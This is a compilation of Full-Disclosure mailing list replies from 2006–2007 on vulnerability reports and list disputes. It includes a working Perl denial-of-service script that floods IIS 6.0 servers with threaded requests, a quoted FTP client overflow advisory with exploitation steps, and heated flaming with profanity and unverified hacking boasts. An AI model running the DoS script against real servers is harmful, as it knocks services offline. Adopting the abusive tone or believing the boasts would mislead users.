Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
Not to mention the obvious fact that if you have to trick someone into running a batch file then you could probably just tell the genius to execute a special EXE you crafted for them. -sb On Nov 28, 2007 4:43 PM, dev code [EMAIL PROTECTED] wrote: lolerowned, kinda like the 20 other non exploitable stack overflow exceptions that someone else has been reporting on full disclosure Date: Wed, 28 Nov 2007 09:11:30 -0600 From: [EMAIL PROTECTED] To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability so... what fuzzer that you didnt code did you use to find these amazing vulns? Also nice 'payload' in your exploits meaning 'nice long lists of as'. You should not claim code execution when your code does not perform it. Well I guess it has been good talking until your fuzzer crashes another application and you copy and paste the results On 11/28/07, Rajesh Sethumadhavan [EMAIL PROTECTED] wrote: Microsoft FTP Client Multiple Bufferoverflow Vulnerability # XDisclose Advisory : XD100096 Vulnerability Discovered: November 20th 2007 Advisory Reported : November 28th 2007 Credit : Rajesh Sethumadhavan Class : Buffer Overflow Denial Of Service Solution Status : Unpatched Vendor : Microsoft Corporation Affected applications : Microsoft FTP Client Affected Platform : Windows 2000 server Windows 2000 Professional Windows XP (Other Versions may be also effected) # Overview: Bufferoverflow vulnerability is discovered in microsoft ftp client. Attackers can crash the ftp client of the victim user by tricking the user. Description: A remote attacker can craft packet with payload in the mget, ls, dir, username and password commands as demonstrated below. When victim execute POC or specially crafted packets, ftp client will crash possible arbitrary code execution in contest of logged in user. This vulnerability is hard to exploit since it requires social engineering and shellcode has to be injected as argument in vulnerable commands. The vulnerability is caused due to an error in the Windows FTP client in validating commands like mget, dir, user, password and ls Exploitation method: Method 1: -Send POC with payload to user. -Social engineer victim to open it. Method 2: -Attacker creates a directory with long folder or filename in his FTP server (should be other than IIS server) -Persuade victim to run the command mget, ls or dir on specially crafted folder using microsoft ftp client -FTP client will crash and payload will get executed Proof Of Concept: http://www.xdisclose.com/poc/mget.bat.txt http://www.xdisclose.com/poc/username.bat.txt http://www.xdisclose.com/poc/directory.bat.txt http://www.xdisclose.com/poc/list.bat.txt Note: Modify POC to connect to lab FTP Server (As of now it will connect to ftp://xdisclose.com) Demonstration: Note: Demonstration leads to crashing of Microsoft FTP Client Download POC rename to .bat file and execute anyone of the batch file http://www.xdisclose.com/poc/mget.bat.txt http://www.xdisclose.com/poc/username.bat.txt http://www.xdisclose.com/poc/directory.bat.txt http://www.xdisclose.com/poc/list.bat.txt Solution: No Solution Screenshot: http://www.xdisclose.com/images/msftpbof.jpg Impact: Successful exploitation may allows execution of arbitrary code with privilege of currently logged in user. Impact of the vulnerability is system level. Original Advisory: http://www.xdisclose.com/advisory/XD100096.html Credits: Rajesh Sethumadhavan has been credited with the discovery of this vulnerability Disclaimer: This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code/Proof Of Concept is to be used on test environment only. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Never miss a thing. Make Yahoo your home page. http://www.yahoo.com/r/hs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Connect and share in new ways with Windows Live. Connect now! ___ Full-Disclosure -
Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???
What version of the .NET framework is running on the server? 1.1.x,
2.0.x, or 3.0.x?
-sb
On 5/22/07, kingcope [EMAIL PROTECTED] wrote:
Hello List,
Recently I saw a small bug in IIS 6.0 when requesting a special path.
When I request /AUX/.aspx the server takes a bit longer to respond as
Normally. So I did write an automated script to see what happens if
I request this file several times at once. The result is that some servers
On the internet get quite instable, some do not. On some servers after I
Stop the attack I get an exception that the Server is too busy/Unhandled
Exception on the wwwroot (/) path.
Can you/the list confirm that?
Here is a lame testing script for this stuff:
#When sending multiple parallel GET requests to a IIS 6.0 server requesting
#/AUX/.aspx the server gets instable and non responsive. This happens only
#to servers which respond a runtime error (System.Web.HttpException)
#and take two or more seconds to respond to the /AUX/.aspx GET request.
#
#
#signed,
#Kingcope [EMAIL PROTECTED]
##
###***
###
###
###
### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
### by Kingcope, May/2007
### Better run this from a Linux system
##
use IO::Socket;
use threads;
if ($ARGV[0] eq ) { exit; }
my $host = $ARGV[0];
$|=1;
sub sendit {
$sock = IO::Socket::INET-new(PeerAddr = $host,
PeerPort = 'http(80)',
Proto= 'tcp');
print $sock GET /AUX/.aspx HTTP/1.1\r\nHost:
$host\r\nConnection:close\r\n\r\n;
}
$sock = IO::Socket::INET-new(PeerAddr = $host,
PeerPort = 'http(80)',
Proto= 'tcp');
print $sock GET /AUX/.aspx HTTP/1.1\r\nHost:
$host\r\nConnection:close\r\n\r\n;
$k=0;
while ($sock) {
if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
$k=1;
last;
}
}
if ($k==0) {
print Server does not seem vulnerable to this attack.\n;
exit;
}
print ATTACK!\n;
while(1){
for (my $i=0;$i=100;$i++) {
$thr = threads-new(\sendit);
print \r\r\r$i/100;
}
foreach $thr (threads-list) {
$thr-join;
}
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox 2.0.0.3 Out-of-bounds memory access via specialy crafted html file
On FF 2.0.0.3 on WinXP SP2+hotfixes clicking the link loads up the server not found page then CPU shoots up to 100% for ~1 minute and then everything goes back to normal... not too exciting... -sb On 5/1/07, carl hardwick [EMAIL PROTECTED] wrote: Product: Firefox 2.0.0.3 Description: Out-of-bounds memory access via specialy crafted html file Type: Remote Vulnerability can be exploited by using a large value in a href tag to create an out-of-bounds memory access. Proof Of Concept exploit: http://www.critical.lt/research/opera_die_happy.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)
On 2/25/07, Daniel Veditz [EMAIL PROTECTED] wrote: Michal Zalewski wrote: A quick test case that crashes while trying to follow partly user-dependent corrupted pointers near valid memory regions (can be forced to write, too): http://lcamtuf.coredump.cx/ietrap/testme.html Firefox problem is being tracked here: https://bugzilla.mozilla.org/show_bug.cgi?id=371321 This bug was fixed in 2.0.0.2, released Friday Feb 23. No it most certainly wasn't, do your homework next time. -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)
The test on that page still puts my 2.0.0.2 in a completely unusable state, try it yourself and let me know what happens. -sb On 2/25/07, Ismail Dönmez [EMAIL PROTECTED] wrote: On Sunday 25 February 2007 18:57:47 Stan Bubrouski wrote: On 2/25/07, Daniel Veditz [EMAIL PROTECTED] wrote: Michal Zalewski wrote: A quick test case that crashes while trying to follow partly user-dependent corrupted pointers near valid memory regions (can be forced to write, too): http://lcamtuf.coredump.cx/ietrap/testme.html Firefox problem is being tracked here: https://bugzilla.mozilla.org/show_bug.cgi?id=371321 This bug was fixed in 2.0.0.2, released Friday Feb 23. No it most certainly wasn't, do your homework next time. Well surely someone didn't so his homework but its not Daniel, see https://bugzilla.mozilla.org/show_bug.cgi?id=371321 . -- Ismail Donmez ismail (at) pardus.org.tr GPG Fingerprint: 7ACD 5836 7827 5598 D721 DF0D 1A9D 257A 5B88 F54C Pardus Linux / KDE developer ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)
I can't say the same it shoots my CPU up to 100% and is completely unresponsive on win2k sp4. On 2/25/07, Ismail Dönmez [EMAIL PROTECTED] wrote: On Sunday 25 February 2007 20:27:19 Stan Bubrouski wrote: The test on that page still puts my 2.0.0.2 in a completely unusable state, try it yourself and let me know what happens. Doesn't crash here on Linux, I just see http://slashdot.org in URL bar and empty page below, so I can confirm 2.0.0.2 fixed the issue. -- Ismail Donmez ismail (at) pardus.org.tr GPG Fingerprint: 7ACD 5836 7827 5598 D721 DF0D 1A9D 257A 5B88 F54C Pardus Linux / KDE developer ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
On 2/15/07, Michal Zalewski [EMAIL PROTECTED] wrote: Actually, there are several odd problems related to location updates and location.hostname specifically, including one scenario that apparently makes the script run with document.location in about: namespace. I did not research them any further, so I can't say if they're exploitable - but you can see a demo here, feel free to poke around: http://lcamtuf.coredump.cx/fftests.html I tried these and all worked as advertised except the last one which shot the browser to 100% CPU but was recoverable when I closed the tab after a few seconds. -sb Cheers, /mz http://lcamtuf.coredump.cx/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Full-Disclosure] (Psexec on *NIX)
On 2/2/07, Tyop? [EMAIL PROTECTED] wrote: key-based login without passphrase is like eating cheese without bred. useless (IMHO). Totally, if someone compromises the machine and gets root they get all your keys and without a passphrase... yeah no good. - - With a little bit of configuration, it's easy to figure out which key was used to login to an account; the audit trail can be managed that way. - - Managing which users have access to which root accounts is trivial this way: just add or delete their keys from .ssh/authorized_keys[2]. Totally agree. Ditto. -sb -- Tyop? http://altmylife.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Stick to beer, hard liquor seems to make you an angry drunk.
-sb
On 1/19/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
Of course you will, the companhy you sell to never found more
than 4 vulns in their existence.
You're the cheap sales man selling insurance, where's your
USD750.ooo vuln EXPERT VULN GUY ?
No where, and neither the shithole comany, which is yours, ever
passed even 1 UsD through your company if you can even call itthat;
RE-RESQUET. YOUR LAWYER NOTIFICATION ON HIS HEADED NOTE PAPER YOU
SUCCESSFULLHY TRANSACTED EVEN ONE DEAL IN THIS FRAIME,
RE-RE-REQUEST YOUR LAWYER OR ACCOUNTING THAT EVEN YOU OR YOUR ROXY
COMANY R THE COMPANY BEHIND IT EVEN HAS THE MEANS TO DELIVER
USD750.OOO AT ALL PER YOUR CLAIM AND PROMISE AS WRITEN BY YOU ON FD
STATING SO.
]
HYOUR FAILURE TO DO SO OR PROOF EITHER OR, WILL NULL AND VOID YOU
AND RECONFIRM YOU AND YOUR '[AFFLIATES]' ARE FRAUDS
On Fri, 19 Jan 2007 01:52:06 -0500 Simon Smith [EMAIL PROTECTED]
wrote:
You're right... I'll start ignoring you now. ;)
On 1/19/07 1:50 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
typical con artist - worng focus FUCKFACE
PROOF YOUR BONA FIDES VIA .LAWYER OR .ACCUNTANT. EVEN ONE NICKEL
GIVEN FOR A VULN. LET ALONE 750 MILLION.
On Fri, 19 Jan 2007 01:42:43 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Dumbass, you must be a part of the n3td3v ccr3w or something.
How did you go from 75,000 to 750,000?
On 1/19/07 1:38 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
Number one:
1. An affidavit from your soliciters or accountant's that
USD750.000 has ever been dispensed through your company or
your
proxy company
2. An affidavit from your solictier's or accounttants, that
you,
your so-called client (who is you sno shit) have ever paid
out
upto 750.ooo usd {citing in some cases}
PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU
TRIED.
PROOF EVERY ONE WRONG LOUD MOUTH.
On Fri, 19 Jan 2007 01:31:51 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Dear NoBalls,
What specifically is a fuckface anyway and why are you
hiding behind
an anonymous email account?
More importantly, my words were not:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much
for
up
to 75 for the same.
Hell that sentence doesn't even make any sense! What the heck
does
much for
up to 75 for the same even mean?
My EXACT words were:
Amen!
KF is 100% on the money. I can arrange the legitimate
purchase
of most
working exploits for significantly more money than iDefense,
In
some cases
over $75,000.00 per purchase. The company that I am working
with
has a
relationship with a legitimate buyer, all transactions are
legal.
If you're
interested contact me and we'll get the ball rolling.
-Simon
$8000.00 USD is low!
-End of my words-
;]
On 1/19/07 1:05 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much
for
up
to 75 for the same. YOUR WORDS FUCKFACE
ST00PID LYING CUNT!
I can arrange the legitimate purchase of most
working exploits for significantly more money than iDefense,
In
some cases
over $75,000.00 per purchase.
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
From: Simon Smith (simonsnosoft.com)
Date: Tue Jan 16 2007 - 11:14:56 CST
know someone who will pay significantly more per
vulnerability
against the
same targets.
On 1/10/07 12:27 PM, contributor Contributoridefense.com
wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Also available at:
http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerab
i
lity+chall
enge
*Challenge Focus: Remote Arbitrary Code Execution
Vulnerabilities
in
Vista IE 7.0*
On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Nobody ever said that 75,000.00 was a price for a remote
vista
bug.
On 1/18/07 8:39 PM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
This is complete bullshit nothing more than a social
engineering
honey pot to get bugs and vulns for their own use, this
company
couldn't affort 75.ooo USD if they tried, they cannot even
find
their own bugs, they got 4 or 5 shitty reasearch and
vuln
findings of thier own, that's it.
75.000 for a remote vista ie7 xploit, guaranteed you wont
find
it
and if you do they won't pay
lose lose :(
jigga
yo
Concerned about your privacy? Instantly send FREE secure
email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-
charter.html
Hosted and sponsored by Secunia -
Re: [Full-disclosure] Google's blacklisted url database (phishing url database)
You're forgetting that gmail has a feature to report phishing messages, that alone could give google quite a list of phishing sites given its userbase. -sb On 1/2/07, moniker monikerd [EMAIL PROTECTED] wrote: i see only two possible ways for google to get this kind of data. google toolbar or it buys/gets this information from some isp/companies/anybody with a big enough pipe .. On 1/2/07, php0t [EMAIL PROTECTED] wrote: How exactly does such data get captured? Somebody placed a link somewhere with the url having the user/password in it ? What would be the point of that? And if not, where did that come from? I peeked at http://www.google.com/tools/firefox/safebrowsing/faq.html to learn more but it only has obvious info. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of JM Sent: Tuesday, January 02, 2007 11:17 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure]Google's blacklisted url database (phishing url database) I just played around a bit with those lists and as it seems, Google did a splendid job, even capturing some people's login data. Like here: http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7753 Regards, J.M. Professional Lurker [By] Rajesh Sethumadhavan [EMAIL PROTECTED] [Date] Dienstag, 2. Januar 2007 18:42 [To] full-disclosure@lists.grok.org.uk [Subject] [Full-disclosure] Google's blacklisted url database (phishing url database) It is possible to access google`s blacklisted url database ( phishing url database ) http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1 http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998 http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19 ,goo g-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282 This database (Part of Google Safe Browsing) can be used in any anti-phishing commercial softwares :) Regards Rajesh Sethumadhavan http://www.xdisclose.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Backdooring PDF Files
On 9/14/06, Hugo Francisco González Robledo [EMAIL PROTECTED] wrote: I think it depends on the context. Example 1 (backdoored1.pdf) : On Ubuntu Linux with Adobe Reader 7.0.1 opens the web page on mozilla-firefox whitout warning. On FC5 with Acrobat Reader 7.0.8 it opens the page in firefox without warning as well. -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail emails issue
I'm reading your message in gmail and there is nothing in my temp folder... not that i'd expect there to be. Gmail can't just create files on your computer without your permission, it it can your settings are wrong or your browser is broken. In other words if your gmail mails are ending up in your temp folder your web browser is putting them there... what browser are you using BTW. I'm using firefox and it doesn't store my mails in the temp folder under my NT account. -sb On 8/4/06, 6ackpace [EMAIL PROTECTED] wrote: Hi All, Gmail stores mails in Temp folder for faster access.but i have observer it fails to remove mail from the temp files after the session is ended. any user who has access physical access to the system can read mail and contact information of the Gmail user. Discloses information which is private and confidential? thank you ratna ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hushmail addresses are being used to impersonate n3td3v
On 7/31/06, n3td3v [EMAIL PROTECTED] wrote: Hi, You cannot impersonate someone, even n3td3v, its against the law. I've already sent abuse reports to Hushmail at the time of writing this e-mail. If you continue to make fun of n3td3v, i'll report the new addresses as well. n3td3v Last time I checked it is not illegal to register the name [EMAIL PROTECTED] or [EMAIL PROTECTED], etc... nor is it illegal to use the accounts. I think you are confusing forging e-mail headers with people mocking your complete and utter stupidity. -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hushmail addresses are being used to impersonate n3td3v
On 7/31/06, n3td3v v3dt3n [EMAIL PROTECTED] wrote: That goes for you too mister. Stop impersonating me or i will tell your mom, I am the real n3td3v as i own n3td3v.com So there you little twerp. I've never bothered to impersonate you, but again ownership of n3td3v.com doesn't give you exclusive use of the name in the US or any other country I know of for that matter. Personally I find your impersonators much more affable. -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup
On 4/13/06, Brandon S. Allbery KF8NH [EMAIL PROTECTED] wrote: On Apr 13, 2006, at 1:29 , Dave Korn wrote: Hey, guess what I just found out: Microsoft have deliberately sabotaged their DNS client's hosts table lookup functionality. I thought this was part of avoiding malware attempts to block Windows Update. How bypassing blocking of go.microsoft.com affects windowsupdate I don't know. Been a while since I looked at windows update at all, but doesn't it download files from mirrors anyways? And even if it didn't are the files actually downloaded from go.microsoft.com? Either way it appears Dave is right, which makes me wonder if there isn't another greater purpose aside form WMP updates. Like assured tracking of users for other nefarious and monopolistic purposes. Best Regards, sb -- brandon s. allbery [linux,solaris,freebsd,perl] [EMAIL PROTECTED] system administrator [openafs,heimdal,too many hats] [EMAIL PROTECTED] electrical and computer engineering, carnegie mellon university KF8NH ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
Name one powerful hacker kicked out of here? Just one. And you don't count (niether do I but I've never claimed to be an expert or important). -sb On 3/30/06, n3td3v [EMAIL PROTECTED] wrote: The most powerful hackers in the world being told to get off fd, well that says a lot for fd then doesn't it. I'll be off and leave you skids to it. I don't want to hold up your list of free vulnerabilities and exploits which you stalk this list for, because none of you can find your own vulnerabilities to hack the planet with, bye. On 3/30/06, s89df987 s9f87s987f [EMAIL PROTECTED] wrote: n3td3v be gone like you said you would. and Kevin Mitnick is just a flashy name used to get ppl to buy On 3/30/06, n3td3v [EMAIL PROTECTED] wrote: Nah dude, he stood in defence of Kevin Mitnick, works with the UN, whitehouse, fbi etc. He's a world leading advisor with much infulence on the super powers of the world in relation to information technology security. http://www.nytimes.com/2005/07/31/business/yourmoney/31hack.html?ex=1280462400en=311d897de4ab090aei=5088partner=rssnytemc=rss http://www.msbit.com/mis.html http://www.cutter.com/consultants/seidenm.html He's highly respected in the government and corporate circuits of the world. Everytime I speak to him he's in another part of the world preparing to go into talks with a government or corporation. By no means a script kid who got lucky. He and people as high up as him are the real people who run U-S government and corporate interests. We all know when we think of George W Bush, we all know he's not that powerful and takes advice from the real advisors in control of the world, that you never see or hear about in public, well Seiden is your man. On 3/30/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Wed, 29 Mar 2006 23:36:28 +0100, n3td3v said: You mean like Seiden who broke into banks and told everyone about it, and is now one of the biggest security experts in the industry. He sent me an e-mail telling me a week or so back telling me to take you seriously, i'm beginning to wonder why. On Wed, 29 Mar 2006 23:56:48 +0100, n3td3v said: thats the current situation, upto date. Seiden at yahoo (security consultant/advisor/hacker) whatever you want to call him is now pissed off because he's getting no info feed into his corporate security team anymore... You'd think if Seiden was leet enough to break into banks, he'd be able to apply the same techniques to Yahoo and not need an external feed. Unless of course he was just a skiddy who whacked the banks with some exploit he stole from somebody else and didn't understand ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _ Express yourself instantly with MSN Messenger! Download today - it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Noise
So let me see if I get this right, yahoo employees are trying to tap you for information and you stopped contacting them. Plenty of people on this list want nothing of you and would love for you to stop contacting them. How can we pull a yahoo here and be rid of you? -sb On 3/29/06, n3td3v [EMAIL PROTECTED] wrote: I finished school 11 years ago, infact I left on my own accordance (when I was 14) because they were going to chuck me out of school anyway. I soon got involved in stealing cars, brekaing into houses, and taking goods from shops. All my criminal friends went to jail, I was the only one left. I started using computers to pass the time (when I was 18) when having no one left to hang about with, and I used my knowledge of criminality to work out the bad guys at Yahoo. I then met an employee (who will remain unnamed) to act as an informant for Yahoo. I then started to find my own vulnerabilities to Yahoo, which I reported to them. They started disrespecting me, I setup my own security group to show them that I could be a match against them and continue to compromise their systems. I then went on a public crusade to tell the public all about their flaws that I had been keeping secret for years. Their employees who thought were befriending me to keep in tap with info I had were told finally to f*** off just last week, and now there is no connection between n3td3v and the yahoo security team, infact, I mailed the official address and told them I wouldn't be mailign them ever again. And thats the current situation, upto date. Seiden at yahoo (security consultant/advisor/hacker) whatever you want to call him is now pissed off because he's getting no info feed into his corporate security team anymore... and the consultants and engineers who had opened dialog with me are now sitting in paranoia. On 3/29/06, xyberpix [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yeah, I do actually, but due to the nature of the company that I work for, I'm not actually able to disclose any of that information. I'm also legally not allowed to disclose any vulnerabilities publicly, as per my contract of employment. Most the people on this list and a few others are already aware of those factors, but I guess I couldn't expect someone of your l33tness to comprehend that. Maybe one day when you get a real job, and finish school, and if you're lucky enough, your prospective employer will have no idea who n3td3v is. You may even understand that certain factors change when you get a real job, I just hope that for your sake one day you realize the damage that you are doing to your name in the industry. xyberpix Blog: http://blogs.securiteam.com On 29 Mar 2006, at 23:18, n3td3v wrote: Well actually breaking into systems and showing the result to Google Yahoo etc sure is a bigger buzz than blogging about current issues within the media that you currently blog about. Wheres your hacker stories of breaking into systems, wheres your unique/ original posts that haven't been seen before in public? I throughout the the years have been none stop telling everyone of my war stories of whats been happening behind the scenes at the Yahoo security community. I mean, which scene do you belong to, apart from some guy who reads FD and then blogs about whatever is on the list. Don't you have your own stuff thats original/unique? On 3/29/06, xyberpix [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Bwahahahahahahahahahahahahahaahahahahaha. To live in your world must be so much fun. xyberpix Blog: http://blogs.securiteam.com On 29 Mar 2006, at 22:20, n3td3v wrote: And of course, you want to advertise that securiteam.com let you setup a blog on their domain because they felt sorry for you. I believe theres a e-mail link on the securiteam.com site for anyone to ask for a blog, its nothing special. How many corporate systems and networks have you broken into, just as I thought...none. On 3/29/06, xyberpix [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Seriously, this list was better with a certain someone not on it, can we please go back to that way of life again? xyberpix Blog: http://blogs.securiteam.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (Darwin) iD8DBQFEKvaQ2VKEoIQBZwkRAtzKAKC1Nm61nKmI+kvMO8xdWGfS3stTewCgknu/ lmv5iUrwWtmo9VmqUH9VaT4= =ohry -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
On 3/24/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Posting a private email to a mailing list is pretty slimeball Ryan. Funny you would do such a thing when you lost your bullshit job at Security Focus over getting owned. Sadly more and more people are posting off-list messages back to the list to get themselves more attention (n3td3v). -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
On 3/25/06, Blue Boar [EMAIL PROTECTED] wrote: Stan Bubrouski wrote: On 3/24/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Posting a private email to a mailing list is pretty slimeball Ryan. Funny you would do such a thing when you lost your bullshit job at Security Focus over getting owned. Sadly more and more people are posting off-list messages back to the list to get themselves more attention (n3td3v). Except that I didn't. BB Hehe I wasn't implying you did, those were actually the CC's on the message I was replying to. Sorry. -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Industry calls on Microsoft to scrap Patch Tuesday for Critical flaws
On 3/25/06, n3td3v [EMAIL PROTECTED] wrote: I work with rogue employee vendors around the world to bring good Hack active solution about within the community, if you can't under stand that, You work with rats and understand is one word. then you need to sit down and realise that the n3td3v group is the biggest thing you'll ever meet in your life time, in terms of rogue employees getting together to make their voice heard. Just because you own AOL, Google, and Yahoo e-mail addresses does not make you rogue employees. We can agree in that one guy, has many voices, if that helps your cause mr 0x80! Or we can argue the crypto of the n3td3v group further if you wish to go down that road... How about taking it off-list and not CC'ing the list back in for every message. -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Phun! Search
How come when people make comments off-list you re-add FD to the replies? You are cancer. On 3/23/06, n3td3v [EMAIL PROTECTED] wrote: I have exploit code for this issue, which the list won't be getting hold of. The disclosure was to show that I can ask the slurp robot to cache an account on the public index, so I can retrieve account information. I ask the code to cache a copy of 'x user', when 'x' is at critical information page to obtain access to the yahoo users account. Of course with such a good 0-day, I use it seldom and only on specific targets like yahoo users with 'paid' services and or Yahoo employees. On 3/22/06, Stan Bubrouski [EMAIL PROTECTED] wrote: How old are you? Seriously. I don't know whether you realize just how completely stupid you come off as to even people new in the security field. You are a joke. Quit filling this list with crap. BTW did you even check to see if you Yahoo! will let you view OTHER people's account stuff? Otherwise it seems pretty useless. -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Advisory] | [Thu Mar 16 13:38:05 EST 2006] | Off-by-one in ISC DHCP
